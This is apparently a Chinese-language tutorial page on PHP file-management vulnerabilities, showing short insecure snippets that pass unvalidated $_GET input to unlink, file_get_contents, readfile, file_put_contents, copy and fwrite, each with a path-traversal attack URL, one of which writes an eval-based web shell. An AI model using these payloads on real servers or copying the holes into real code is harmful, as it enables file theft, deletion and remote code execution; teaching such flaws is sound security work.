ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、视频、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
# 文件管理漏洞 PHP 的用于文件管理的函数,如果输入变量可由用户提交,程序中也没有做数据验证,可 能成为高危漏洞 常见函数 : copy、rmdir、unlink、delete、fwrite、 chmod、fgetc、fgetcsv、fgets、fgetss、file、file\_get\_contents 、fread、readfile、ftruncate、 file\_put\_contents、fputcsv、fputs fopen 增加 删除 编写 修改 unlink ``` <pre class="calibre10">``` <span class="token">//test.php?f=../../demo.php</span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'f'</span><span class="token3">]</span><span class="token3">;</span> <span class="token5">if</span> <span class="token3">(</span><span class="token4">is_file</span><span class="token3">(</span>$f<span class="token3">)</span><span class="token3">)</span> <span class="token3">{</span> <span class="token4">unlink</span><span class="token3">(</span>$f<span class="token3">)</span><span class="token3">;</span> <span class="token3">}</span> ``` ``` file\_get\_contents ``` <pre class="calibre10">``` <span class="token">//test.php?f=../../demo.php</span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'f'</span><span class="token3">]</span><span class="token3">;</span> echo <span class="token4">file_get_contents</span><span class="token3">(</span>$file<span class="token3">)</span><span class="token3">;</span> <span class="token">//不会输出但是在浏览器查看源代码可以查看demo.php的源代码</span> ``` ``` readfile ``` <pre class="calibre10">``` <span class="token">//test.php?f=../../demo.php</span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'f'</span><span class="token3">]</span><span class="token3">;</span> echo <span class="token4">readfile</span><span class="token3">(</span>$file<span class="token3">)</span><span class="token3">;</span> <span class="token">//输出demo的长度不会输出内容但是在浏览器查看源代码可以查看demo.php的源代码</span> ``` ``` file\_put\_contents ``` <pre class="calibre10">``` <span class="token">//test.php?f=../../demo.php&text=<?php eval($_POST['CMD'])?></span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'f'</span><span class="token3">]</span><span class="token3">;</span> $text<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'text'</span><span class="token3">]</span><span class="token3">;</span> <span class="token4">file_put_contents</span><span class="token3">(</span>$file<span class="token3">,</span>$text<span class="token3">)</span><span class="token3">;</span> ``` ``` copy ``` <pre class="calibre10">``` <span class="token">//test.php?f=../../demo.php&text=demo2.php</span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'f'</span><span class="token3">]</span><span class="token3">;</span> $text<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'text'</span><span class="token3">]</span><span class="token3">;</span> <span class="token4">copy</span><span class="token3">(</span>$file<span class="token3">,</span>$text<span class="token3">)</span><span class="token3">;</span> ``` ``` ``` <pre class="calibre17">``` <span class="token">//test.php?f=../../demo.php</span> $file<span class="token1">=</span>$_GET<span class="token3">[</span><span class="token2">'f'</span><span class="token3">]</span><span class="token3">;</span> <span class="token4">fwrite</span><span class="token3">(</span><span class="token4">fopen</span><span class="token3">(</span>$file<span class="token3">,</span><span class="token2">'a+'</span><span class="token3">)</span><span class="token3">,</span><span class="token2">'<?php phpinfo();?>'</span><span class="token3">)</span><span class="token3">;</span> ``` ```